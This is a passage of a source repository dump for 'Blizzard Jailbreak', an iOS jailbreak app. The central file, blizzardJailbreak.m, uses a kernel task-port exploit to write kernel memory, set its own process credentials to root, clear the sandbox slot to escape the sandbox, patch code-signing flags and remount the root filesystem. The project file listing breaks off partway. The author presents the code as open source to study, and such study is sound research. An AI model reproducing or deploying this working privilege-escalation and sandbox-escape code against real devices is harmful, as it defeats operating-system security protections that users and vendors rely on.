"\n\n\n\n\tCFBundleDevelopmentRegion\n\t$(DEVELOPMENT_LANGUAGE)\n\tCFBundleDisplayName\n\tBLIZZARD\n\tCFBundleExecutable\n\t$(EXECUTABLE_NAME)\n\tCFBundleIdentifier\n\t$(PRODUCT_BUNDLE_IDENTIFIER)\n\tCFBundleInfoDictionaryVersion\n\t6.0\n\tCFBundleName\n\t$(PRODUCT_NAME)\n\tCFBundlePackageType\n\tAPPL\n\tCFBundleShortVersionString\n\t1.0\n\tCFBundleVersion\n\t1\n\tLSRequiresIPhoneOS\n\t\n\tUILaunchStoryboardName\n\tLaunchScreen\n\tUIMainStoryboardFile\n\tMain\n\tUIRequiredDeviceCapabilities\n\t\n\t\tarmv7\n\t\n\tUIRequiresFullScreen\n\t\n\tUIStatusBarStyle\n\tUIStatusBarStyleLightContent\n\tUISupportedInterfaceOrientations\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\n\tUISupportedInterfaceOrientations~ipad\n\t\n\t\tUIInterfaceOrientationPortrait\n\t\tUIInterfaceOrientationPortraitUpsideDown\n\t\tUIInterfaceOrientationLandscapeLeft\n\t\tUIInterfaceOrientationLandscapeRight\n\t\n\tUIViewControllerBasedStatusBarAppearance\n\t\n\n\n" }, { "path": "Blizzard Jailbreak/blizzardJailbreak.h", "content": "//\n// blizzardJailbreak.h\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#ifndef blizzardJailbreak_h\n#define blizzardJailbreak_h\n\n#include \nextern mach_port_t tfp0;\nvoid remountFirstStepSys(void);\nint ios11_exploit_init(void);\nint rootifyOurselves(void);\nint rootifyProcessByPid(void);\nint restoreProcessCredentials(uint64_t creds, pid_t pid);\nint obtainAPFSSnapshotsList(void);\nint remountFileSystem(void);\nint setcsflags(pid_t pid);\nint prepareKernelForPatchFinder(void);\nint cleanupAfterBlizzard(void);\nint installBootStrap(void);\nuint64_t findOurOwnProcess(void);\nuint64_t escapeSandboxForProcess(pid_t proc_pid);\nuint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess);\n#endif /* blizzardJailbreak_h */\n" }, { "path": "Blizzard Jailbreak/blizzardJailbreak.m", "content": "//\n// blizzardJailbreak.c\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n#import \n#include \"blizzardJailbreak.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n#include \n#include \n#include \n#include \n#include \n#include \n#include \n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \"../Exploits/sock_port/offsetof.h\"\n#include \"../Exploits/sock_port/offsets.h\"\n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Kernel Utilities/kexecute.h\"\n#include \"BlizzardLog.h\"\n#include \"../APFS Utilities/rootfs_remount.h\"\n#include \"../APFS Utilities/snapshot_tools.h\"\n#include \"../Kernel Utilities/kernSymbolication.h\"\n#include \"../AMFI Utilities/amfi_utils.h\"\n\n#define BlizzardJailbreakPath(obj) strdup([[[[NSBundle mainBundle] bundlePath] stringByAppendingPathComponent:@obj] UTF8String])\nint APFS_SNAPSHOT_EXISTS = 1;\n\nmach_port_t tfp0 = 0;\nuint64_t KernelBase;\nuint64_t defaultCredentials;\nuint64_t ourProc;\n\nvoid platformize(pid_t pid) {\n if (!pid) return;\n \n uint64_t proc = proc_of_pid(pid);\n uint64_t task = rk64(proc + off_task);\n uint32_t t_flags = rk32(task + off_t_flags);\n t_flags |= 0x400; // add TF_PLATFORM flag, = 0x400\n wk32(task+off_t_flags, t_flags);\n uint32_t csflags = rk32(proc + off_p_csflags);\n wk32(proc + off_p_csflags, csflags | 0x24004001u); //patch csflags\n}\n\n\nint ios11_exploit_init(){\n printf(\"Blizzard Jailbreak\\nby GeoSn0w (@FCE365)\\n\\nAn Open-Source Jailbreak for you to study and dissect :-)\\n\\n\");\n tfp0 = get_tfp0();\n if (MACH_PORT_VALID(tfp0)){\n printf(\"Successfully got tfp0!\\n\");\n init_kernel_utils(tfp0);\n KernelBase = grabKernelBase();\n if (!KernelBase) {\n printf(\"ERROR: Failed to find kernel base\\n\");\n return 2;\n }\n kernel_slide = (uint32_t)(KernelBase - 0xFFFFFFF007004000);\n\n int ret = prepareKernelForPatchFinder(); // patchfinder\n if (ret != 0) {\n printf(\"Failed to initialize patchfinder\\n\");\n return 3;\n }\n \n printf(\"Initialized patchfinder\\n\");\n ourProc = findOurOwnProcess();\n rootifyOurselves();\n defaultCredentials = escapeSandboxForProcess(getpid());\n initializeKernelExecute();\n uint64_t kern_proc = proc_of_pid(0);\n printf(\"Kernel Proc is: 0x%llx\\n\", kern_proc);\n setcsflags(getpid()); // set some csflags\n platformize(getpid()); // set TF_PLATFORM\n return 0;\n } else {\n printf(\"ERROR: Could not get tfp0!\\n\");\n return -1;\n }\n \n}\n\nint cleanupAfterBlizzard(){\n restoreProcessCredentials(defaultCredentials, getpid()); // Give back our process' credentials, otherwise the device will act weird.\n terminateKernelExecute(); // Always clean up after your jailbreak components. Helps stability a lot.\n terminatePatchFinder();\n return 0;\n}\n\nint rootifyOurselves(){\n printf(\"Preparing to elevate own privileges to ROOT!\\n\");\n printf(\" Current UID: %d\\n\", getuid());\n printf(\" Current EUID: %d\\n\", geteuid());\n uint64_t proc = proc_of_pid(getpid()); // Get our PID's PROC structure.\n uint64_t ucred = rk64(proc + off_p_ucred); //Get our credentials.\n wk32(proc + off_p_uid, 0);\n wk32(proc + off_p_ruid, 0);\n wk32(proc + off_p_gid, 0);\n wk32(proc + off_p_rgid, 0);\n wk32(ucred + off_ucred_cr_uid, 0);\n wk32(ucred + off_ucred_cr_ruid, 0);\n wk32(ucred + off_ucred_cr_svuid, 0);\n wk32(ucred + off_ucred_cr_ngroups, 1);\n wk32(ucred + off_ucred_cr_groups, 0);\n wk32(ucred + off_ucred_cr_rgid, 0);\n wk32(ucred + off_ucred_cr_svgid, 0);\n \n printf(\" New UID: %d\\n\", getuid());\n printf(\" New EUID: %d\\n\", geteuid());\n \n if (getuid() != 501 && geteuid() != 501){\n printf(\"Successfully got ROOT!\\n\");\n } else {\n printf(\"ERROR: Failed to get ROOT!\\n\");\n return -1;\n }\n return 0;\n}\nint restoreProcessCredentials(uint64_t creds, pid_t pid){\n uint64_t proc = proc_of_pid(pid);\n uint64_t ucred = rk64(proc + off_p_ucred);\n uint64_t cr_label = rk64(ucred + off_ucred_cr_label);\n wk64(cr_label + off_sandbox_slot, creds);\n \n if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) != 0){\n printf(\"Successfully restored the Sandbox!\\n\");\n return 0;\n } else {\n printf(\"ERROR: Failed to restore the Sandbox!\\n\");\n return -1;\n }\n}\nuint64_t escapeSandboxForProcess(pid_t proc_pid) {\n printf(\"Preparing to escape the sandbox...\\n\");\n uint64_t target_process;\n uint64_t ucred;\n uint64_t sb_cr_label;\n uint64_t default_creds;\n \n if (proc_pid == 0) {\n printf(\"ERROR: Will NOT mess with Kernel's PID...\\n\");\n return -2;\n }\n \n target_process = proc_of_pid(proc_pid);\n ucred = rk64(target_process + off_p_ucred);\n sb_cr_label = rk64(ucred + off_ucred_cr_label);\n default_creds = rk64(sb_cr_label + off_sandbox_slot);\n wk64(sb_cr_label + off_sandbox_slot, 0);\n \n /*\n As far as I am aware, the first slot is used by AMFI. Sandbox should be the second.\n Read Jonathan Levin's book on the Sandbox chaper for more details about the credentials.\n */\n \n if (rk64(rk64(ucred + off_ucred_cr_label) + off_sandbox_slot) == 0){\n printf(\"Successfully escaped the Sandbox!\\n\");\n return default_creds;\n } else {\n printf(\"ERROR: Failed to escape the Sandbox!\\n\");\n return -1;\n }\n}\n\nint rootifyProcessByPid(){\n return 0;\n}\n\nuint64_t findOurOwnProcess(){\n static uint64_t self = 0;\n if (!self) {\n self = rk64(current_task + koffset(KSTRUCT_OFFSET_TASK_BSD_INFO));\n printf(\"Found Ourselves at 0x%llx\\n\", self);\n } else {\n printf(\"ERROR: Cannot find our own process!\\n\");\n }\n return self;\n}\n\nuint64_t copyPIDCredentials(pid_t processToBeGivenCreds, pid_t donorProcess){\n printf(\"CredentialsCopier: Giving process %d process %d's credentials...\\n\", processToBeGivenCreds, donorProcess);\n uint64_t procFromPID = proc_of_pid(processToBeGivenCreds);\n uint64_t donorproc = proc_of_pid(donorProcess);\n uint64_t processCredentials = rk64(procFromPID + off_p_ucred);\n uint64_t donorcred = rk64(donorproc + off_p_ucred);\n \n if (procFromPID != 0 || donorcred != 0){\n wk64(procFromPID + off_p_ucred, donorcred);\n printf(\"CredentialsCopier: Successfully granted credentials from process!\\n\");\n return processCredentials;\n } else {\n printf(\"CredentialsCopier: Failed to copy credentials from process!\\n\");\n return -1;\n }\n}\n\nint remountFileSystem(){\n int returnValue = remountRootFS();\n\n if (returnValue == 0) {\n printf(\"ROOT FS REMOUNT: Successfully remounted!\\n\");\n return 0;\n } else {\n printf(\"ROOT FS REMOUNT: Failed to Remount!\\n\");\n return -1;\n }\n}\n\nint setcsflags(pid_t pid) {\n if (!pid) return NO;\n uint64_t proc = proc_of_pid(pid);\n uint32_t csflags = rk32(proc + off_p_csflags);\n uint32_t newflags = (csflags | CS_PLATFORM_BINARY | CS_INSTALLER | CS_GET_TASK_ALLOW | CS_DEBUGGED) & ~(CS_RESTRICT | CS_HARD | CS_KILL);\n wk32(proc + off_p_csflags, newflags);\n \n if (rk32(proc + off_p_csflags) == newflags){\n printf(\"Successfully set CodeSign Flags!\\n\");\n return 0;\n } else {\n printf(\"Failed to set CodeSign Flags!\\n\");\n return -1;\n }\n}\n\nint spawnBinaryAtPath(char *binary, char *arg1, char *arg2, char *arg3, char *arg4, char *arg5, char *arg6, char**env) {\n pid_t pd;\n const char* args[] = {binary, arg1, arg2, arg3, arg4, arg5, arg6, NULL};\n int rv = posix_spawn(&pd, binary, NULL, NULL, (char **)&args, env);\n if (rv) return rv;\n return 0;\n}\n\nint prepareKernelForPatchFinder(){\n NSString *kernelNewLocation;\n NSError *error;\n NSFileManager *fileManager = [NSFileManager defaultManager];\n NSDateFormatter *dateTimeFormat = [[NSDateFormatter alloc] init];\n [dateTimeFormat setDateFormat:@\"dd.MM.YY:HH.mm.ss\"];\n \n NSString *PathToDocuments = [[[fileManager URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject] path];\n mkdir(strdup([PathToDocuments UTF8String]), 0777);\n kernelNewLocation = [PathToDocuments stringByAppendingPathComponent:[NSString stringWithFormat:@\"%@_kernelcache\", [dateTimeFormat stringFromDate:[NSDate date]]]];\n printf(\"Kernel Decompression: Copying Kernel to %s\\n\", [kernelNewLocation UTF8String]);\n \n [fileManager copyItemAtPath:@\"/System/Library/Caches/com.apple.kernelcaches/kernelcache\" toPath:kernelNewLocation error:&error];\n if (error) {\n printf(\"Kernel Decompression: Failed to copy the kernelcache with the following error: %s\\n\", [[error localizedDescription] UTF8String]);\n return 4;\n }\n \n if (decompressKernelCache(strdup([kernelNewLocation UTF8String]))) {\n printf(\"Kernel Decompression: Error initializing KernelSymbolFinder\\n\");\n return 4;\n }\n initializePatchFinderWithBase(0, (char *)[[kernelNewLocation stringByAppendingString:@\".dec\"] UTF8String]);\n return 0;\n}\n\nint installBootStrap(){\n int retval;\n printf(\"Blizzard BOOTSTRAP: Preparing to Bootstrap!\\n\");\n printf(\"Blizzard BOOTSTRAP: Creating a pre-jailbreak Snapshot! This will be useful in case we wanna un-jailbreak.\\n\");\n int checkSnap = verifySnapshot(\"/\", \"Calm-Before-The-Storm\");\n \n if (checkSnap != APFS_SNAPSHOT_EXISTS){\n printf(\"Blizzard BOOTSTRAP: Temporarily setting kernel credentials\\n\");\n uint64_t creds = copyPIDCredentials(getpid(), 0);\n if (createNewAPFSSnapshot(\"/\", \"Calm-Before-The-Storm\") == 0){\n list_snapshots(\"/\");\n printf(\"Blizzard BOOTSTRAP: Successfully created the stock snapshot!\\n\");\n retval = 0;\n } else {\n printf(\"Blizzard BOOTSTRAP: FAILED to create the stock snapshot!\\n\");\n retval = -1;\n }\n uint64_t proc_smp = proc_of_pid(getpid());\n wk64(proc_smp + off_p_ucred, creds);\n return retval;\n } else {\n printf(\"Blizzard BOOTSTRAP: Safety Snapshot already exists! Will not make another one :-)\\n\");\n return 0;\n }\n}\n" }, { "path": "Blizzard Jailbreak/blizzardView.h", "content": "//\n// blizzardView.h\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \n\nNS_ASSUME_NONNULL_BEGIN\nUIBarButtonItem* dismissKeyboardButton;\n@interface blizzardView : UIViewController\n@property (weak, nonatomic) IBOutlet UIButton *blizzardInit;\n@property (weak, nonatomic) IBOutlet UITextField *nonceField;\n\n@end\n\nNS_ASSUME_NONNULL_END\n" }, { "path": "Blizzard Jailbreak/blizzardView.m", "content": "//\n// blizzardView.m\n// Blizzard Jailbreak\n//\n// Created by GeoSn0w on 8/10/20.\n// Copyright © 2020 GeoSn0w. All rights reserved.\n//\n\n#import \"blizzardView.h\"\n#include \"blizzardJailbreak.h\"\n#define iosVersionSupport(v) ([[[UIDevice currentDevice] systemVersion] compare:@v options:NSNumericSearch] != NSOrderedDescending)\n\n@interface blizzardView () \n\n@end\n\n@implementation blizzardView\n\n- (void)viewDidLoad {\n [super viewDidLoad];\n self.nonceField.delegate = self;\n printf(\"Blizzard Jailbreak\\nby GeoSn0w (@FCE365)\\n\\nAn Open-Source Jailbreak for you to study and dissect :-)\\n\");\n}\n- (IBAction)blizzardInit:(id)sender {\n if (iosVersionSupport(\"13.7\")){\n _blizzardInit.enabled = NO;\n [_blizzardInit setTitle:@\"JAILBREAKING...\" forState:UIControlStateDisabled];\n dispatch_async(dispatch_get_global_queue(0, 0), ^{\n dispatch_async(dispatch_get_main_queue(), ^{\n [self performSegueWithIdentifier:@\"vc\" sender:self];\n });\n });\n } else if (iosVersionSupport(\"14.0\")){\n printf(\"The iOS version is not supported\");\n exit(0);\n }\n \n \n}\n- (IBAction)injectSettingsUI:(id)sender {\n [self performSegueWithIdentifier:@\"settingsView\" sender:self];\n}\n- (IBAction)saveJailbreakSettings:(id)sender {\n [self dismissViewControllerAnimated:YES completion:nil];\n}\n- (BOOL)textFieldShouldReturn:(UITextField *)textField {\n [textField resignFirstResponder];\n return YES;\n}\n@end\n" }, { "path": "Blizzard Jailbreak/main.m", "content": "//\n// main.m\n// sock_port\n//\n// Created by Jake James on 7/17/19.\n// Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import \n#import \"AppDelegate.h\"\n\nint main(int argc, char * argv[]) {\n @autoreleasepool {\n return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));\n }\n}\n" }, { "path": "Blizzard Jailbreak.xcodeproj/project.pbxproj", "content": "// !$*UTF8*$!\n{\n\tarchiveVersion = 1;\n\tclasses = {\n\t};\n\tobjectVersion = 48;\n\tobjects = {\n\n/* Begin PBXBuildFile section */\n\t\t8288501222E07303005D10FC /* kernel_memory.c in Sources */ = {isa = PBXBuildFile; fileRef = 8288501022E07303005D10FC /* kernel_memory.c */; };\n\t\t8288501522E07C15005D10FC /* offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = 8288501322E07C14005D10FC /* offsets.m */; };\n\t\t82E9B71522E24BAD0016AA39 /* iosurface.c in Sources */ = {isa = PBXBuildFile; fileRef = 82E9B71422E24BAD0016AA39 /* iosurface.c */; };\n\t\t82F179F122DF4ED700231F8C /* AppDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179F022DF4ED700231F8C /* AppDelegate.m */; };\n\t\t82F179F722DF4ED700231F8C /* Main.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F522DF4ED700231F8C /* Main.storyboard */; };\n\t\t82F179F922DF4ED700231F8C /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 82F179F822DF4ED700231F8C /* Assets.xcassets */; };\n\t\t82F179FC22DF4ED700231F8C /* LaunchScreen.storyboard in Resources */ = {isa = PBXBuildFile; fileRef = 82F179FA22DF4ED700231F8C /* LaunchScreen.storyboard */; };\n\t\t82F179FF22DF4ED700231F8C /* main.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F179FE22DF4ED700231F8C /* main.m */; };\n\t\t82F17A0922DF4ED800231F8C /* socket_freeTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A0822DF4ED800231F8C /* socket_freeTests.m */; };\n\t\t82F17A1422DF4ED800231F8C /* socket_freeUITests.m in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A1322DF4ED800231F8C /* socket_freeUITests.m */; };\n\t\t82F17A2322DF4EF100231F8C /* exploit.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2122DF4EF100231F8C /* exploit.c */; };\n\t\t82F17A2622DF4F1C00231F8C /* exploit_utilities.c in Sources */ = {isa = PBXBuildFile; fileRef = 82F17A2422DF4F1C00231F8C /* exploit_utilities.c */; };\n\t\tD613B71B24E217D90069CA9B /* BlizzardLog.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B71A24E217D90069CA9B /* BlizzardLog.m */; };\n\t\tD613B72724E2A76A0069CA9B /* rootfs_remount.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B72424E2A76A0069CA9B /* rootfs_remount.m */; };\n\t\tD613B72824E2A76A0069CA9B /* offsetfinder.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B72624E2A76A0069CA9B /* offsetfinder.cpp */; };\n\t\tD613B73524E2A8AB0069CA9B /* snapshot_tools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B73424E2A8AB0069CA9B /* snapshot_tools.c */; };\n\t\tD613B74524E2B1C20069CA9B /* liboffsetfinder64.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73B24E2B1530069CA9B /* liboffsetfinder64.a */; };\n\t\tD613B74624E2B1E70069CA9B /* libimg4tool.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73F24E2B1540069CA9B /* libimg4tool.a */; };\n\t\tD613B74724E2B1E70069CA9B /* libmerged.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73E24E2B1530069CA9B /* libmerged.a */; };\n\t\tD613B74824E2B1E70069CA9B /* libplist.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73C24E2B1530069CA9B /* libplist.a */; };\n\t\tD613B74924E2B1E70069CA9B /* libplist++.a in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B73D24E2B1530069CA9B /* libplist++.a */; };\n\t\tD613B74B24E2B2560069CA9B /* libcompression.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74A24E2B2560069CA9B /* libcompression.tbd */; };\n\t\tD613B74D24E2B2600069CA9B /* libMobileGestalt.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D613B74C24E2B25F0069CA9B /* libMobileGestalt.tbd */; };\n\t\tD613B75024E2CD5E0069CA9B /* BlizzardSpawnerTools.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B74E24E2CD5E0069CA9B /* BlizzardSpawnerTools.c */; };\n\t\tD613B75724E2E8300069CA9B /* amfi_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75324E2E8300069CA9B /* amfi_utils.m */; };\n\t\tD613B75824E2E8300069CA9B /* amfid_tools.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75424E2E8300069CA9B /* amfid_tools.m */; };\n\t\tD613B75924E2E8300069CA9B /* amfid_mem.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75624E2E8300069CA9B /* amfid_mem.m */; };\n\t\tD613B75C24E2E8590069CA9B /* amfid.m in Sources */ = {isa = PBXBuildFile; fileRef = D613B75B24E2E8580069CA9B /* amfid.m */; };\n\t\tD613B76024E2EEFD0069CA9B /* osobject.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B75E24E2EEFD0069CA9B /* osobject.c */; };\n\t\tD613B76624E2F2D30069CA9B /* kernSymbolication.c in Sources */ = {isa = PBXBuildFile; fileRef = D613B76424E2F2D30069CA9B /* kernSymbolication.c */; };\n\t\tD613B78224E2F9980069CA9B /* lzssdec.cpp in Sources */ = {isa = PBXBuildFile; fileRef = D613B78024E2F9980069CA9B /* lzssdec.cpp */; };\n\t\tD62BC51E24E4113200EC63D4 /* tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51D24E4113200EC63D4 /* tar */; };\n\t\tD62BC52024E41AF500EC63D4 /* basebins.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC51F24E41AF500EC63D4 /* basebins.tar */; };\n\t\tD62BC52224E41F2500EC63D4 /* dropbear.tar in Resources */ = {isa = PBXBuildFile; fileRef = D62BC52124E41F2500EC63D4 /* dropbear.tar */; };\n\t\tD62CA1E524E1C7EA002E6756 /* patchfinder64.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E424E1C7EA002E6756 /* patchfinder64.m */; };\n\t\tD62CA1E824E1C7F7002E6756 /* kexecute.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1E624E1C7F7002E6756 /* kexecute.c */; };\n\t\tD62CA1EB24E1C7FF002E6756 /* kernel_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EA24E1C7FF002E6756 /* kernel_utils.m */; };\n\t\tD62CA1EE24E1C83F002E6756 /* offsetof.c in Sources */ = {isa = PBXBuildFile; fileRef = D62CA1EC24E1C83E002E6756 /* offsetof.c */; };\n\t\tD63EDAC124E1989F009B305D /* blizzardJailbreak.m in Sources */ = {isa = PBXBuildFile; fileRef = D63EDABF24E1989F009B305D /* blizzardJailbreak.m */; };\n\t\tD69C4C9925686628001DE2BC /* IOKit.tbd in Frameworks */ = {isa = PBXBuildFile; fileRef = D69C4C9825686627001DE2BC /* IOKit.tbd */; };\n\t\tD69C4CAE25686895001DE2BC /* ios13_userspace_pac.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA425686894001DE2BC /* ios13_userspace_pac.c */; };\n\t\tD69C4CAF25686895001DE2BC /* ios13_kernel_universal.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA525686894001DE2BC /* ios13_kernel_universal.c */; };\n\t\tD69C4CB025686895001DE2BC /* ios13_userspace.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA625686894001DE2BC /* ios13_userspace.c */; };\n\t\tD69C4CB125686895001DE2BC /* ios13_change_offsets.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CA725686894001DE2BC /* ios13_change_offsets.m */; };\n\t\tD69C4CB225686895001DE2BC /* libsnappy.c in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAA25686895001DE2BC /* libsnappy.c */; };\n\t\tD69C4CB325686895001DE2BC /* ios_7st_utils.m in Sources */ = {isa = PBXBuildFile; fileRef = D69C4CAB25686895001DE2BC /* ios_7st_utils.m */; };\n\t\tD6FFA56224E1A59A00CAC2E2 /* blizzardView.m in Sources */ = {isa = PBXBuildFile; fileRef = D6FFA56124E1A59A00CAC2E2 /* blizzardView.m */; };\n/* End PBXBuildFile section */\n\n/* Begin PBXContainerItemProxy section */\n\t\t82F17A0522DF4ED800231F8C /* PBXContainerItemProxy */ = {\n\t\t\tisa = PBXContainerItemProxy;\n\t\t\tcontainerPortal = 82F179E422DF4ED700231F8C /* Project object */;\n\t\t\tproxyType = 1;\n\t\t\tremoteGlobalIDString = 82F179EB22DF4ED700231F8C;\n\t\t\tremoteInfo = socket_free;\n\t\t};\n\t\t82F17A1022DF4ED800231F8C /* PBXContainerItemProxy */ = {\n\t\t\tisa = PBXContainerItemProxy;\n\t\t\tcontainerPortal = 82F179E422DF4ED700231F8C /* Project object */;\n\t\t\tproxyType = 1;\n\t\t\tremoteGlobalIDString = 82F179EB22DF4ED700231F8C;\n\t\t\tremoteInfo = socket_free;\n\t\t};\n/* End PBXContainerItemProxy section */\n\n/* Begin PBXFileReference section */\n\t\t8288501022E07303005D10FC /* kernel_memory.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = kernel_memory.c; sourceTree = \"\"; };\n\t\t8288501122E07303005D10FC /* kernel_memory.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kernel_memory.h; sourceTree = \"\"; };\n\t\t8288501322E07C14005D10FC /* offsets.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = offsets.m; sourceTree = \"\"; };\n\t\t8288501422E07C14005D10FC /* offsets.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = offsets.h; sourceTree = \"\"; };\n\t\t82E9B71322E24BAC0016AA39 /* iosurface.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = iosurface.h; sourceTree = \"\"; };\n\t\t82E9B71422E24BAD0016AA39 /* iosurface.c */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.c; path = iosurface.c; sourceTree = \"\"; };\n\t\t82F179EC22DF4ED700231F8C /* Blizzard Jailbreak.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = \"Blizzard Jailbreak.app\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F179EF22DF4ED700231F8C /* AppDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = AppDelegate.h; sourceTree = \"\"; };\n\t\t82F179F022DF4ED700231F8C /* AppDelegate.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = AppDelegate.m; sourceTree = \"\"; };\n\t\t82F179F622DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/Main.storyboard; sourceTree = \"\"; };\n\t\t82F179F822DF4ED700231F8C /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = \"\"; };\n\t\t82F179FB22DF4ED700231F8C /* Base */ = {isa = PBXFileReference; lastKnownFileType = file.storyboard; name = Base; path = Base.lproj/LaunchScreen.storyboard; sourceTree = \"\"; };\n\t\t82F179FD22DF4ED700231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"\"; };\n\t\t82F179FE22DF4ED700231F8C /* main.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = main.m; sourceTree = \"\"; };\n\t\t82F17A0422DF4ED800231F8C /* Blizzard JailbreakTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = \"Blizzard JailbreakTests.xctest\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F17A0822DF4ED800231F8C /* socket_freeTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeTests.m; sourceTree = \"\"; };\n\t\t82F17A0A22DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"\"; };\n\t\t82F17A0F22DF4ED800231F8C /* Blizzard JailbreakUITests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = \"Blizzard JailbreakUITests.xctest\"; sourceTree = BUILT_PRODUCTS_DIR; };\n\t\t82F17A1322DF4ED800231F8C /* socket_freeUITests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = socket_freeUITests.m; sourceTree = \"\"; };\n\t\t82F17A1522DF4ED800231F8C /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = \"\"; };\n\t\t82F17A2122DF4EF100231F8C /* exploit.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit.c; sourceTree = \"\"; };\n\t\t82F17A2222DF4EF100231F8C /* exploit.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit.h; sourceTree = \"\"; };\n\t\t82F17A2422DF4F1C00231F8C /* exploit_utilities.c */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.c; path = exploit_utilities.c; sourceTree = \"\"; };\n\t\t82F17A2522DF4F1C00231F8C /* exploit_utilities.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = exploit_utilities.h; sourceTree = \"\"; };\n\t\t82F17A2822DF57B700231F8C /* IOKit.tbd */ = {isa = PBXFileReference; lastKnownFileType = \"sourcecode.text-based-dylib-definition\"; name = IOKit.tbd; path = socket_free/IOKit.tbd; sourceTree = \"\"; };\n\t\tD613B71924E217D90069CA9B /* BlizzardLog.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = BlizzardLog.h; sourceTree = \"\"; };\n\t\tD613B71A24E217D90069CA9B /* BlizzardLog.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = BlizzardLog.m; sourceTree = \"\"; };\n\t\tD613B72424E2A76A0069CA9B /* rootfs_remount.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = rootfs_remount.m; sourceTree = \"\"; };\n\t\tD613B72524E2A76A0069CA9B /* rootfs_remount.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = rootfs_remount.h; sourceTree = \"\"; };\n\t\tD613B72624E2A76A0069CA9B /* offsetfinder.cpp */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.cpp.cpp; path = offsetfinder.cpp; sourceTree = \"\"; };\n\t\tD613B72924E2A79F0069CA9B /* 